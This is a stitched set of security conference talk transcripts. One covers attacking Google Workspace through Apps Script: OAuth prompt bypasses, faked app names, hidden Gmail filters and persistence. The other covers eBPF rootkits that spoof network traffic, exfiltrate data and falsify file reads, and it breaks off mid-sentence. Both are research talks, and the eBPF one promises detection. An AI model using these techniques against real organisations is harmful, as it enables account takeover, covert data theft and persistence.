introduced what's called, you know, unverified app warning prompt. Firstly, smaller apps that require these scopes. And, you know, they went and they cracked down a lot of these other misleading OAuth apps, right. They beat up their security around like what you can name an OAuth app to prevent sort of the same exact attack we saw before so they can mimic Google style names and stuff like that as well. So just some quick, you know, food for thought here. This attack really didn't utilize a whole lot of like, you know, crazy zero day bugs or exploits, you know, apart from, I guess, you know, some of the Unicode trickery for the name. It was basically kind of using the system as designed, right. But the impact was actually like incredibly substantial, right. So that's something to really think about here is like, you know, you don't necessarily have to have one big bug or one exploit to sort of pull off these crazy attacks. You can simply abuse the system as it was designed and design itself can just let itself to attacks like this. So just something to sort of think about in general with this, the kind of this talk. So we talked about the history. Let's go into like the latest right so all the will negation is in place. What can we bypass and what can we do in this sort of modern age. So, you know, I talked earlier about the unverified app prompt. This is for apps, of course, that, you know, ask the sensitive scopes, and there's quite a few of them. So what essentially this is not like, you know, kind of a light warning. This is a really serious prompt that actually would dissuade users from continuing. It kind of takes it looks like it sort of takes some tips from like, you know, Google Chrome's like UI for like in about SSL, you know, sites that you visit. And so the way the user can actually continue is they have to like click this little text. This is like show advanced, you know, and they have to go down to the bottom and click through. And, you know, for the regular user, this is just not going to be a tenable thing. They're just not going to be able to get through this. And so it actually poses a significant barrier for us as attackers and if we want to, you know, fish a user via a lot here. So what is a you know, sensitive or restricted scope. So that just means any API with the potential to access sort of like private data. So say, you know, this is everything from my Gmail BigQuery, Google Cloud Drive calendar is basically it's actually a large percentage of the scope so it's over 120 API is the way that works is essentially if it's a small app, if it has less than 100 users, you have this unverified app prompts. And if the app is bigger than 100 users, you need to go through an even more strict process where you undergo service intense manual review process. And this process is like no joke, like there are like companies that you have to use these scubs legitimately for like real world services that they provide. And they have written an entire post saying like, so hard for us to get past this review process right so it's like it's it's a real deal and it's definitely not something that we could really cross if we were like an attacker trying to publish was just that which is not a tenable route for us. But there are some exceptions to this policy. So you take a look at the documentation around this. Essentially, you know, if you have the if it is the case where you have some apps script or an app and you use a sensitive scope and you fall into any of these categories, then you know either the normal off flow without the unverified app prompt will happen or the unverified off flow will happen. So one of these is particular which is the intersection of these two. And essentially what this says is it says, you know, hey, if the publisher of this app is in the same G Suite org as the user who's authorizing it and running it, then there'll be no unverified app prompts. And this this sort of makes sense right like you can imagine you've got an employee who's who works with you. They've created this app, and they then share it with you and you want to run it. You know, it doesn't really you trust them there. It's an internal action. So it wouldn't really make sense to have this Gary prompt because it's sort of used internal and to what implicitly trustworthy. So that's something interesting that we could if we could abuse that we could essentially get around this. And one other thing to note about Apps Script is when you have an Apps Script that it can be either a sort of standalone project a standalone script that runs, or they can be what is what's called you know bound to a container. And by container this means like basically you can bind it to like a Google Doc or a sheet slot or a slide. And you know when you do this, this allows you scripting to basically you know you can manipulate the document, customize the UI stuff like that. And what works is essentially you know the regular triggers I talked about before, the one for any user who basically has added access to the doc so they have to have access to the doc and then they can kick off any of these Apps Script triggers and sort of run this app. Keeping in mind, of course, they still have to, you know, accept the OAuth prompts if they're requesting any, you know, scopes. So this is sort of our average you know OAuth phishing scenario right say we have a Google Doc with some Apps Script attached to it, and we send our victim this link who's inside of this G Suite org. When they go to actually you know they open the doc and they trigger it and you know prompt spawns they of course get the, you know, hey Google hasn't verified this app. It's requesting sensitive scopes. And so likely the victims will be like, nah, this isn't for me. I don't even know how to get through this. And so our, you know, our attempt is probably going to fail here, right. So one interesting thing about Google Docs and sheets and slides and you know all this stuff is that if you change the average URL that you get, you know, from edit to copy, instead of just directly opening to like this document interface, you'll actually get this prompted said. And so this essentially, you know, this prompt here says, hey, do you want to make a copy of in this case, you know, confidential or wide cop and pro details, and they get a little buttons to say make a copy. And when they click this, what ends up happening is it copies the document the sheet into their own Google Drive, and then they're immediately taken to the, you know, the full UI interface for, you know, working with the sheet. And so, you know, going back to the attack I mentioned earlier, so now for an attacker and we send our victim this copy link instead of the regular link. When they go through this make they click to make a copy of it. They'll essentially like it copies into their Google Drive. And then when they trigger, you know, the app script that's attached to it, they will get the regular prompt without this unverified app screen. And the reason why they get this is because if you if you look at the app itself, you'll notice that the actual developer behind the app is the victim. And the reason why it's the victim is because when they copied that doc, what they ended up doing was essentially they became the creator because they copied the doc there and now the creator and owner of the script. And so they'll actually see that they themselves are requesting the permission from themselves. So there's one problem though. So when you actually copy, you know, what a document with ask it to test to it, the triggers don't come along from the ride. So they don't really have a way to trigger this thing to get this prompt to display. So that's kind of a that's kind of a pain. So one way that we can get around this problem is Google sheets have what are called macros. This is sort of something made to compete with like, you know, Microsoft Excel is like VB script style stuff to like manipulate and automate spreadsheets. And what's useful about the Google sheets version is they can call arbitrary apps scripts. And what's even more useful is you can actually, if you have like an image or you know, I have in your Google sheets, you can assign a macro. So like when somebody clicks on the image, it will automatically run this macro which by proxy runs any arbitrary apps script that you want. And so this, you know, basically is a great way to sort of like trigger your apps script payload. So I've got a little demo here where you can see the victim and they go in here and they click make a copy of this of this Google sheets. And after they've clicked that button taken directly to your copied sheets and you see this beautiful image of this goose with this butter knife looking totally not threatening at all. And when they go to click on that they get the authorization prompts and when they click continue, you can see they have, you know, the regular OAuth prompt no warnings at all. So essentially bypassed that whole restriction around unverified apps. But that's not actually all that we bypass. So in addition to bypassing the unverified app, you know, screen, we've also, you know, I mentioned earlier this little bit earlier in the talk but that you know G Suite admin setting that allows you to basically like lock down your organization to prevent third party OAuth apps from requesting permissions on your employees accounts. This actually gets around that as well. This entire system is essentially bypassed and the reason for that is exactly the same reason as the reason for bypassing the unverified app prompt, because the app is owned by, you know, it's basically when the copy into is made into the Google Drive of the, you know, the victim, and they're inside the org, essentially like this makes it means that the OAuth app itself, it's instead of the new owner. It's an internal app. So it's not a third party app. It's actually first party. It's inside the org. And so this doesn't apply, you know, this block on all third party API access. It doesn't apply. So this is bypassed as well. So another, you know, fun tip for sort of defeating the both the third party app restrictions and the unfair verified app prompt is that, you know, if you go through the docs, you realize that, you know, the doc that's attached to like the app script and vice versa, they have the same owner. And so it's interesting about this is say you have somebody who's created a new Google Sheets or doc or whatever inside of their G Suite domain. And if you created that that's actually kind of a bypass willing to happen, because if they share at an access with anybody outside of the organization, that person with their access can actually go in and they can like then create some apps script for that document. And the owner is still the person that created the, you know, the Docker the sheet in the first place right. So it says that sticks now you can essentially use that to start off your, you know, your phishing or whatever attempt right because that will bypass all of the third party and the app restriction that we talked about previously because it will be owned by the employee that first created this document. So if you can find one of these, you know, this is a great starting place where you can sort of skip the whole copy style attack. So we talked about how to sort of like pierce the perimeter. Now let's go into sort of like once you've got some access you maybe you compromised or we have one one employee G Suite account. Where do you go past then right what can you pivot to, you know, how can you escalate privileges. So likely, you know, most companies I'd say probably the most interesting data they have is in Google cloud. And so pivoting to Google cloud from your app script implant seems pretty important. So accessing Google cloud through apps script is not super documented, but you can do it by basically requesting the scope cloud platform. And that actually gives you access to all GCP API so everything like big query to Google cloud functions GCE all of it as the user who basically you know authorizes access to your app right. So the way that you essentially authenticate to these API is as you use the app script function script app get a lot of token. And you take that value you put it in the authorization bearer header, and you can use that to authenticate to all the API's. But when you do this there's kind of a gotcha so you'll notice that when you try to use this for the Google, you know, GCP API's, you're going to get this, you know, warning that says like, you know, API that you're trying to access it's not been used in this project ID, you know this number before, you know, either it's not been used or it's disabled. So this request is failed. What's even more strange is, you know, the product number that's displayed. It's not going to be for the product that you're even, you know, trying to access. So what's the deal with this year. Again, not super well documented, but essentially when you know you create a new app script app upon that creation you're allocated a sort of hidden Google cop project that's that's immediately attached to this app script app associated with it. And so what happens is like this implicitly binds your API request that you make from your, you know, access token generated by your implant with this project so it just sort of like that's why you have this arbitrary project number it's for this hidden project. And you unfortunately for the hidden project you can't like access it via the Google Cloud control panel or anything like that you can't enable services on it. I use like programmatically like you know I would be able to. And so this is kind of a big problem right. Well it turns out that you can actually get around this by specifying the x dash Google dash user desk project header. And you can specify the product name that you're trying to query right so you spent so if you're going for like, you want to modify a project example, you do this header and then set it to that value. That basically looks like this you know, set your product ID and your API calls set it in the header, and you put your authorization bear header to that script, the script app that get a token value that I mentioned before, and you can, you know, go on you can talk to all the GCB API is to your hearts content, right. If the data you're looking for doesn't happen to be you know the good stuff isn't in Google, you know Google Cloud, then it's probably in Google Drive right, maybe like more financial driven companies all their stuff is in sheets and drive. And so let's talk about sort of mining Google Drive for the good stuff. So we're dealing with kind of the general overview of how sharing works in Google Drive. So by default in G Suite there's essentially like these three permission levels, the most restricted, you know, sharing settings for a file is that, you know, only people who are explicitly as the ACL are allowed to access the documents you just got to go one by one and add different you know other users and to give them access to it if they are on the list they cannot view the document right they can access it. So the second level is, you know, anybody who has a link to the document or the file, they can access it. So you essentially are sharing by link. So if they have a link they can access it but they don't they they can't right. And then the, the widest most open setting is you can even make it so that hey anybody who just searches inside of the drive web page, they can find your internal doc by doing that right if they're also in the company. So yeah, these are the defaults essentially you know by default it has a strictest sharing settings where you have to explicitly add people one click away from that the most restricted settings is like share by link with everybody who has the link, they can access the document. And then you know if you do more clicks you can get it searchable by everybody right. You know, once somebody view if it is shared by link right and somebody else views it. Once they view it once it becomes searchable in the future because you know the assumption is like you have link, you should be able to find it again because you were able to visit it once. These you are these unique document URLs are outside the range of brute forcing so if somebody does share my link you're not going to be able to brute force the actual link itself you're going to have to actually have it. So we talked about you know sort of like with the default and what the setting system is but real world users tends to be quite different than sort of the strictly technical bits right so what actually ends up happening. So my experience usually what ends up happening is you know if a file is important, almost almost kind of by definition right it's going to be shared with other people right other people are going to view this document they're going to maybe make changes suggestions to it. So, you know in the strictest security setting that we mentioned previously, you know, the owner of the doc is going to have to add individually individual users one by one, and that's a very tedious process, especially when you have like say you're doing it 40 people right that's that's very time consuming. And you know you can use Google groups to sort of like, you know, put together a CL groups that can be added in bulk together, but still very tedious process right so what often ends up happening is people get to a point where they're just like they share it with so many people that they're just like, forget it right and they just like share by link with a large you know anybody who has link like they're good to view it. So in practice that tends to be like pretty pretty common right and only a tiny portion end up being like that wide searchable mode that we talked about before just because the amount of user interaction required. So how do we get access to these, you know, this big area which is like, you know, stuff that's shared by link. So of course there's the there's the basic method which is just like I'll search all the internally shared systems inside of a company let's check, you know, the chat let's check, you know internal forums, you know, Q&A sites, like your ticket management queues, do you know whatever bug trackers and try to mine out and look for all these Google Doc drive links. And you can do that. But there's also another way to do it, which is actually the same way that we do it on the web right how we index and make documents searchable on the web. And so the way this works essentially is you can have a script which will simply like take some seed, you know, Google Drive links, Google Sheets Docs links, it will essentially like it'll go through each one of them so say you give a Google Sheet, it'll go through that it'll parse it it'll find all the links inside of that document, and it will recursively crawl all of those documents as well and look for links inside them, and so forth and so on until it essentially is able to like enumerate all of these other documents which are sort of like, indirectly linked to the all these other documents right. And then you know an Apps Scripts fighter that does exactly this which you can essentially do what I just described right take some seed links, plug it in. It uses a start starting point and basically recursively crawls all this stuff until it's exhausted all the past and it gives you like, you know, along the way it collects like metadata about sharing your document context the authors and stuff like that. So you can essentially like let it run, gather up all these documents you can then like look to the results to see if it has the data that you're looking for. And then you can also download this GitHub link here. So feel free to take a look. Another useful thing to do is to, is to basically request school back says for the people API. And so what this is this is essentially like every you know a G Suite it ships with this really meet ability actually to. It comes with like an internal employee directory. And so with the people API if you request the directory that read only scope, and a minimum, you can access you know you can figure out all the other employees in the G Suite org, and you can get everything from like your names, emails titles, whatever it is. And this becomes extremely useful, something that you probably want to collect early on. So say you first compromise the G Suite employee, you want to use this like to immediately mine all this data out, because say you get revoked by an administrator who catches the same thing, they basically figure out all the you did this fishing campaign, they revoke your app to lead all of your implant stuff. So having this data is very, very useful for reentry because you can make a much, much more well planned attack now that you have a good idea of their, you know, their entire organization via this API. So highly recommend this is as an avenue. So let's talk about escalating your privileges right let's let's sort of like talk about how we can increase what privileges we have and get access to more things. So one thing that is, you know, very, very good source of privilege escalation is like legitimate internal Apps Script apps that are developed by people inside of a G Suite organization that are attached to you know Google Docs Sheets slides stuff like that. So as I mentioned before earlier we talked about Apps Script is being able to be you know we talked about being bound to you know, a doc or a sheet or a slide, and this file that a script is bound to is called its container. And so one of the things we have to ask ourselves is like say you have some Apps Script it has to a doc right. So in this case, do they have separate ACLs like can you make it so they can only edit the script and not the doc. How does it, how does that work exactly. So if you read the Google documentation, they actually share their ACL exactly with its container right so if you have a Google Doc with some Apps Script attached. And you know, somebody has edit permission on the doc, they by proxy have added permission to the script as well. And that leads to some more interesting questions right. So you recall that edit access is required as I mentioned earlier to even run the Apps Script that's attached to a doc so they can't even use your application, unless they have an access to your doc. But if they have added access to the doc or sheet or slide or whatever, then they also have access to be able to edit the Apps Script that's attached to it. So how does this work we have a bunch of people that are all sharing the same, you know, doc or sheet or slide, using the Apps Script attached to it. So, you know, in this given situation right you have like one app say this is like an access to like these employees like Google Drive, you know big query stuff like that it's automating some process for them. They're all have they all have to be granted editor access on the doc, in order to be able to use the Apps Script. And you know they're all sort of sharing it together so they've all authorized this, you know, thing to access their services and on every half. And then, you know, you have one user that's malicious, and of course they have better access in the doc, they go in user at our access to modify the Apps Script attached to the doc to contain instead of the legitimate script a malicious payload that does something nefarious. Right, maybe like maybe like X will trace the docs and they have access to the attacker doesn't have access to something like that. And then when the regular users come along and they trigger the Apps Script like they regularly do, right. The malicious code now runs as them. So this becomes, you know, it's basically very, very hard to write an app like this securely because, you know, just in the way that the system is designed you have to get people out of access and when you do that then you have access to edit the Apps Script and so any shared, you know, documents with scripts attached to them become very exploitable. So we can do actually even do one better than this so you know this piece of tech kind of implies you have to wait around for these people to trigger this Apps Script is attached to the doc and as attackers were often quite impatient, we'd rather force this to happen like right now. So this can be done essentially by you can force a retrigger by basically going to the Apps Script and you can publish a web endpoints. And when you publish this you essentially get a URL and that URL if it's visited by any of these users that have authorized this app, it will immediately trigger the script to execute as them. And this is this is actually really nice because it doesn't it's not just like they have to visit it like in their web browser, they can visit a web page that simply has an image in it that links to this URL, and it will completely that works completely fine it will execute the you know script is that I'm just from like an image that links to this. So the way you do this is you just go to like the deployment you and your Apps Script, you do a new deployment, you do a deployment type of web app. And you simply say like hey, when people hit the same point, I want to run as the user who's accessing the web app and you know deploy it. You get this nice little URL back and this is what you can basically do to like you know, you can put this inside of image tag or something or somehow get the victim to visit this in their browser. And this will trigger this script to automatically run as them. So another useful technique for you know lateral movement inside of a G Suite organization is enumerating and joining open Google groups. So to talk about Google groups right you know Google groups are used for ACL and both you know Google cloud, you know in GCP I am settings and for a variety of like G Suite style services rights. So they use extensively in ACL, but in addition to that they're by default when you create a Google group instead of a G Suite org. They're openly joinable by everybody internally. So by themselves, neither is an issue but when you put them together, this is actually not so great right. You know something that's used extensively for ACLs being by default, you know, widely open and insecure so anybody inside the company can join and basically grant the permissions of this ACL just by joining your group. This is a being kind of a basically a factory for endless privilege escalation right so oftentimes searching and joining Google groups is a great way to just like you know escalate your privileges inside of a Google you know G Suite organization. So what all can be gated by Google groups so imagine like Google cloud and all the services under it right App Engine, you know Google functions but it's also stuff like you know Google Drive Docs sheets whatever things like Google calendar, you know data, you know data studio and even like G Suite admin ACL groups. And it can even use for stuff like you know publishing Chrome extensions so you know most most Google services of some sort of ACL integration with Google groups so tons of places to escalate your privileges. So talking about this in the context of like if you have an Apps Script implants, you know, unfortunately modifying Google groups via Apps Script is not as easy as it sounds. For some reason, unlike all the other like Google services, the Google groups API is which is known as like the director API, it's restricted only to admins. So only G Suite admins can actually like utilize the API. But there is another API which is called the cloud identity API, and that is available to all users so your Apps Script implant could make use of it. And this allows you know some access to Google groups via the API. So some of stuff that you can do with this is you can like list all the Google groups they give an organization, you can list you know the members of the groups their roles, and you can also you know, you can create your own Google groups you can update them delete members, you know stuff like that. And you can manage stuff that you create. But unfortunately the one thing you cannot do be as API is you can't join an open Google group, which is you know super unfortunate. But you know if you if you did have like that if you did have like the full level access to the G Suite account, joining open Google groups is a great way to you know sort of escalate your privileges. So now we talked about escalation let's talk about you know, sort of like stealth and persistence right when you get access to a victim you don't you don't want point in time you want like persistent access you can keep fooling around inside of the organization. We'll start off by talking about some Gmail trickery. One of the things that I recommend with your Apps Script implant using your API access to Gmail is create filters in Gmail to essentially hide security notifications. So things like the emails that say hey you just granted access to a new, you know, Google app. Those kind of notifications you can hide them from the user. You can also create a bunch of filters to like hide password reset emails. So you can like, you know, basically when somebody gets inbound password reset email, you can like hide it in either their trash or like some other folder, so that they don't see it. And since people's email accounts tend to be like the center of like all their security, you can then basically, you know, if like later on, you know you can essentially do resets for all these sub accounts, use the Apps Script to pull the password reset email and then let's get access to them. Unfortunately, you know, when it comes to like creating and forwarding addresses and stuff like this in Gmail, you can't do this via the API. But we will talk about you know if you have like the full access to their account. If you have like the full UI access to Gmail, you can do something that's called adding a forwarding address. And this is super useful for persisting access. Essentially the way that it works is you can set it so that you have like an external mailbox like something at yahoo.com or whatever the external email is, you can make it so that you know anything that measures a given filter, or even just whatever email they receive, a copy of that email will automatically be sent to this other email box, right? So this way you can basically get a copy of all their stuff that's coming into them, and you can set this to like either you know delete the email or just like just make a copy and not not make any changes. So this is a super good way to like sort of keep persistent access to their stuff, even if you end up getting revoked from, you know, or ripped out later on. So one of the things we talked about with this, you know, historical campaign where they used you know an app name of Google Drive. Having a deceptive app name is quite useful. So you can tell that you can see here in this little demo if I try to set my app script app name to Google Docs. Yeah, when you actually go to the permission prompt there it shows, you know, it won't actually do it for you right it says like it'll basically deny it says you know still on type of project it won't set it to Google Doc because that's a misleading name and those you're trying to like do something fishy there so essentially prevents you from setting an app name like that. But, you know, and if you look into like some some of the some of the stuff that they've implemented after this, you know, Google Doc worm came out. All of the sort of like when they were doing the tricks with the Unico characters to like, essentially get the same looking to like an official Google product, all of that has been pretty well stripped out like they have a good system for like preventing you from setting like G Swedish oh oh GL Docs right all that's prevented. None of the know what space tricks any of that works. But I did find that you can use what's the magic of what's called the right to left override character. And I do that aren't familiar what this is this is a Unico character that you can paste in. And when you paste it, all of the proceed all the characters that come after it end up getting put in reverse. And so in this case you can see I basically paste the character in, and I go on to type in Google Docs backwards. And because this is reversed from, you know, right to left instead of left to right, it actually appears in the prompt as Google Docs. Right so we completely bypass this protection by using this. And when the user actually gets to approve this they will just see Google Docs just as they did it with the, you know, initial sort of Google Docs worm. And so what we do right is likely perpetual, you know, after script execution so we want, you know, our script to continually have access to their account we don't just want like the authorize it runs once that's it we want to you know keep access keep persistence and keep around so we can figure out what's inside the Oregon do our thing. And so what we do is we actually run a script that has a really useful feature which is you know time based triggers is sort of the cron style stuff that I mentioned earlier, and this allows for you know background execution on a schedule. And this can be run as often as like every minute. And it executes of course as whatever user was running the script that ended up programmatically creating this trigger right so you can see some example code here. And this will run our, you know, some function call every minute or so. Now if you read the Google, you know, the documentation on this it says, you know, in order to do this in order to run these background scripts, you need to request this specific scope which is script dot script app. And this will cause this like you know human this little thing to come up in your own profits says hey allow this application to run when you're not present so explicitly warns the user that this is not this is running in the background it will run continuously even after you've approved it once. So, it turns out that this is more of a suggestion than there's a hard rule on this say you need to do this but as it you know turns out, it's more of a suggestion really. So, you know, you also create time triggers programmatically without declaring the scope. And, you know, as long as you declare some other scope of any type like Google Drive, you know Gmail whatever it is, as long as they authorize those, you can programmatically create time triggers while you want no execute just fine. So, you can use those persistent persist indefinitely without any of the sort of a lot warrants to the user. So, more of a guideline that a strict rule. You know, we've covered a variety of topics here around, you know, how you can sort of do everything from like pierce the perimeter escalate privileges pivot around persist and stuff like that. So, thank you all for taking the time to see my talk, and be happy to answer any questions that you have.
|
You’ve seen plenty of talks on exploiting, escalating, and exfiltrating the magical world of Google Cloud (GCP), but what about its buttoned-down sibling? This talk delves into the dark art of utilizing Apps Script to exploit G Suite (AKA Google Workspace). As a studious sorcerer, you’ll discover how to pierce even the most fortified G Suite enterprises. You’ll learn to conjure Apps Script payloads to bypass powerful protective enchantments such as U2F, OAuth app allowlisting, and locked-down enterprise Chromebooks. Our incantations don’t stop at the perimeter, we will also discover novel spells to escalate our internal privileges and bring more G Suite accounts under our control. Once we’ve obtained the access we seek, we’ll learn various curses to persist ourselves whilst keeping a low profile so as to not risk an unwelcome exorcism. You don’t need divination to see that this knowledge just might rival alchemy in value. REFERENCES: No real academic references, this is all original research gleaned from real-world testing and reading documentation.
|
10.5446/54225 (DOI)
|
Good day everyone, my name is Pat, I'm a path to file on Twitter, GitHub, Discord and most other places. This talk is about creating and countering the next generation of Linux rootkits using eBPF. So today we're going to start with an overview on what Linux kernel rootkits are and we're going to cover why rootkits are such a powerful tool for attackers but why they're so dangerous to use. Next we're going to introduce eBPF and we're going to discuss on how it can enable an attacker to have all the best parts of a kernel rootkit without any of the risks. Then finally we're going to cover how to detect and prevent eBPF-based rootkits before they take over as the preferred rootkit type for attackers. So firstly, what are kernel rootkits? Well once an attacker compromises a machine they're going to want to maintain that access. So perhaps they exploited a vulnerability in a web application or use some stolen credentials. These holes can be closed and when they are the attacker is going to want a way to regain access to that machine preferably with root privileges and preferably in a way that is undetectable to security systems or systems administrators. This is the role of a rootkit and in terms of access there's no better places to put a rootkit than in the kernel. When a program wants to list the files in a directory it will use a syscall to ask the kernel to read the data from the hard drive on its behalf. If a rootkit can hook or intercept this call then it can simply remove any sensitive file from the directory listing before passing it back to the kernel. This same technique can be used to hide files, processors, network connections, really it can do anything to hide from user space programs. Now by living in the kernel the rootkit also has the ability to tap into all network traffic before any firewall and has the ability to launch processes with root privileges or alter the privileges of existing processes. So this all sounds incredibly useful for an attacker so what's the problem? Well by running code in the kernel it's very easy to turn a small mistake into a very big problem. There isn't any guardrails or safety lines in the kernel. Once code is running there it has the ability to read and write to almost anything. This means if there's a bug in your code and you write to the wrong part of memory you're likely to crash the kernel and if you crash the kernel you crash the entire system. And it could be even worse if the kernel happened to be writing to a hard drive when you broke things you could end up corrupting that disk effectively breaking the entire system. Doing so will almost certainly bring in administrators and incident responders to determine what happened so this is far from an ideal outcome for an attacker. Now even if the rootkit developer was very careful a kernel update has the ability to alter what a function hooked function looks like or what a new kernel object looks like and all this just increases the likelihood of a disaster from occurring. This means that a rootkit developer often has to test the rootkit against every single kernel version that it plans to be deployed upon. So the good parts of kernel rootkits sound really good for an attacker but the risks are often too high to make it viable. If only there was a way to keep the only advantages of a kernel rootkit but have the safety and portability of a user space program. So how about we add JavaScript like capabilities to the Linux kernel. Now to some people this quote might sound like the most wildest thing that they've ever heard but when Thomas Gruff for my surveillance made it he wasn't talking literally about putting JavaScript in the kernel. What he was talking about was introducing a way to run a certain type of code that has the visibility of the kernel but with the ease safety and portability of such user space systems such as JavaScript programs. And really what he was talking about was EBPF. So what is EBPF? So EBPF stands for extended Berkeley packet filtering but it has grown so much from the original BPF particularly in the last two years that any comparison to this classic version isn't really relevant today. So what it is is it's a system within the Linux kernel that allows you to create programmable trace points known as EBPF programs. These programs can be attached to network interfaces to observe network traffic or the entry or exit points of kernel functions including syscalls and can even actually be attached to user space programs and functions. If this sounds like the same places as our kernel rootkit you'd be correct but unlike the kernel rootkit EBPF programs are guaranteed to be safe from crashing the system and they're even portable across kernel versions and even system architectures. So to explain how EBPF can achieve this let's have a look at how EBPF programs get written and loaded. So we'll start with writing the EBPF program. So these are typically written in a restricted version of C or Rust and there's an example of one in the bottom left. So the programs have variables, loops, if statements, all the standard parts of the language but they're heavily restricted in what external functions they can call and is limited to only a number of BPF helper functions. Now instead of compiling this code into a native assembly EBPF programs actually get compiled into what's called BPF bytecode which is a fairly simple but straightforward instruction set. Now the most important thing about this is that the BPF bytecode is independent of the architecture or kernel version that it was compiled on. Now once this bytecode has been compiled it is now ready to be sent to the kernel. So this code is sent to the kernel using a user space program called a loader which makes use of the BPF syscall to send it up into the kernel. Now technically non-root users can load some EBPF programs on some kernel configurations but these programs are extremely limited in what they can do so they're out of scope for this sort of talk. So for the purpose of this talk this loading has to occur from either the root user or a system administrator. Now the kernel just doesn't blindly trust this bytecode so the kernel runs what's called the BPF verifier. Which checks every branch and every possible value of every possible variable in this code to make sure that it is not doing things such as trying to read invalid memory or slow the system down or by being too big or complex or do really anything else that might cause the kernel to crash. So this is where EBPF gets its safety guarantee because only code that passes all of the verified extensive checks is allowed to actually be loaded and run. Now once code has passed the verifier the kernel will then actually run a compiler to convert the bytecode into the native instructions that match that machine's architecture and kernel version. So if it's an x86 machine it will compile it to x86 or if it's rml we are for example. Now by running as native instructions EBPF code can run as fast as efficient as regular kernel code for that machine. But this is not only what this compiler does it actually also dynamically looks up the addresses of the BPF helper functions or any kernel objects that the code is using and it will actually patch the instructions to match that specific kernel version. And so this is where the code can be portable because this compilation step knows exactly what the format of that helper function and what that object looks like for that specific kernel and so by patching the instructions as it goes to compile it it means that that code will be specifically designed to run on that system. Now once these programs are compiled they are attached to either the network interface or the kernel function that they need to be attached to where they will run once for every packet or function call. Now programs can't retain state from one run to the next but they can make use of a global key value store called an EBPF map and so programs can actually store their state in that between runs and then the next time it runs it can read that state and then pick up where it left off. Now that is an extremely quick overview on what EBPF is I'll have links to much more in depth to documentation at the end of this but for now I want to go into what an attacker with the privileges to load and run EBPF programs can do and how can they use it to achieve the same root kit functionality as a regular kernel root kit. So the first thing we're going to cover is using EBPF to warp the network reality. So this is a diagram of a fairly standard web server setup it has two network interfaces so on the left we have the internet facing network interface where a firewall only allows traffic to and from a website that's listening on say port 443. Now on the right we have the administrator's access so this is via a separate network interface that is attached to an internal VPN network and there's an SSH server listing on this internal section and that's how the administrator is when they want to access the machine they will go through the internal network and SSH onto this machine but to make things interesting let's say this SSH connection requires multi-factor authentication. Now an attacker who's gained access to this machine will probably want the ability to connect in from the internet but they still want to be able to gain the same privilege access from the host that seems to be limited only to the internal VPN site. So EBPF programs have the ability to read and write all network packets across all interfaces and before the firewall has the ability to block the connection. What this means is if there was a connection to come in from an attacker's IP address even to a closed port it was from the internet then EBPF can actually alter both the destination and source IP addresses and ports to make it look like this traffic is actually coming from a fake IP address that matches the internal VPN site. It can then route the traffic into the internal interface into the SSH service and so for the perspective of SSH this looks like just a regular connection from the internal systems. Then and not only will SSH see this traffic as regular if an administrator is using tools such as Wireshark or Netstat or TCP dump then from the perspective of these tools the network connection also only appears to be coming from the fake IP address on the internal network and they will have no idea that the connection is actually being routed from the internet. Now this isn't the only tactic EBPF can employ because it has the ability to read and write network packets it has the ability to see any network packets before any other system so it has the ability to receive command and control information from even a port that nothing is listing on and then it can just silently drop those packets so no security system will know that that data that command and control data has actually reached the system. Then while EBPF cannot create its own connections it has the ability to clone existing packets so it could clone some existing traffic that some existing legitimate traffic that say going to the website then alter the destination IP addresses to be the attacker's IP address and then alter the actual data within the packet with to be whatever it wants and then it can send it off to the attacker. So this technique could be used to exaltrate arbitrary data from the machine. Then finally EBPF programs can be attached to the user space programs so for example it could be attached to the website and hook into the functions that do the TLS encryption and decryption for the website. Now we'll explain in more detail how that function hook in works in the next section but what this does enable is it actually enables EBPF to change the data underneath the encrypted TLS connection so that even from an external network monitor it would only see legitimate TLS traffic going to from the website and it doesn't actually know that EBPF might be reaching underneath the TLS and swapping out the website's data to be some exfiltrated data from the system. So altering data across a network is only one type of malicious behavior EBPF can do. The real strength actually lies in its kernel hooking functions and even syscall interception because its disability allows it to walk reality around files, processes and even users. So going back to our SSH example it's not enough to just be able to connect to the service. If logging on requires a valid password and multi-factor authentication then it's unlikely an attacker will be able to easily log on. But what if there was a way to make SSH ignore this multi-factor requirement or even the username and password requirement and just allow anybody to log on to the system? Well so SSH knows that there's extra requirements such as multi-factor due to configuration files that are in the etsy-pamd folder. And when a user is going to authenticate a user's name and password it'll look inside the etsy-password and etsy-shadow files to make sure that the supplied username and passwords are correct. So is there a way that EBPF can lie about the contents of all of these files? So yes and to explore how EBPF can do this let's first quickly revisit how user space programs read files using syscalls. So when a process wants to read a file it'll actually make two syscalls to the kernel. So the first is to open or open at and this will check that the file that the program wants to open actually exists and that the user that's wanting to read the file is actually allowed to do so. Now if they are the kernel will return what's called a file descriptor number or fd number which is simply a reference to that file for that process. Then the process will make a second syscall this time to read where the kernel asking the kernel to read the file that matches the supplied fd number it got from the open call and it'll actually give a memory buffer to the kernel to fill in with the file's content. The kernel will then look up that fd number, make sure it's a valid number, then grab the file and it'll copy the file's data into that processes buffer before returning to the user space process. What this means is if we have four different ebpf programs we can observe what's going on and we can actually watch what is both being sent to and from these two different sets of syscalls. What this means is we're able to track what fd number corresponds to what file name and we can even actually read what the data is contained within the file before the user space program by reading the contents of the buffer after the reads syscall has exited which would be that ebpf program at the bottom. But reading buffers isn't the only thing ebpf can do, it can also write to them. So let's have a look at this basic example. On the left is a very simple user space program, it is looking to open the file called readme and then it's asking the kernel, using the reads syscall, to read the data from that file into a buffer called buffer. Now on the right is the ebpf program that is attached to the exit of the reads syscall. So after the file has been opened and after the user space program asks the kernel to read the file, the kernel will read the file into the buffer but before the user space program gets control again our ebpf program is going to run. So you can see at the start of this program that it's using the bpf probe read user function to read the contents of that buffer which at this stage will include the file data. But there is also a bpf probe write user function. Now this program this actually allows us to alter the data within that buffer and then write it back into user space memory before the user space program sees it. What this means is once the ebpf program exits and controllers return to the user space program, the program will think that the contents of buffer contains the file data when in actuality it contains the faked data that's been put there by ebpf. This bpf write user call can be used to overwrite any user space buffer pointer or string that gets passed into or out of the syscalls or kernel functions. So things like changing what program get launched by execve, or reading and altering netleg data, heaps of different stuff can be possible with this call. So another thing ebpf can do is bypass the syscall all together and instead just pretend that the function ran and return an arbitrary error code or return value. This can be done using the fmodret type of ebpf program which while these can't be attached to every function they can be attached to every syscall at least on newer kernels. So for example, the example in the top right, this program simply pretends to write to a file and it returns the expected success code to indicate that the file was actually written but the file is never actually written and the right syscall is never actually called. Now if the goal is to prevent a process from discovering or stopping the rootkit, a more drastic option can be to simply kill the process. So by using the bpf send signal helper function, the program can send an unstoppable sig kill signal which will immediately instruct the kernel to start tearing down that process regardless of whether it wants to or not. Now this is a pretty drastic action that could 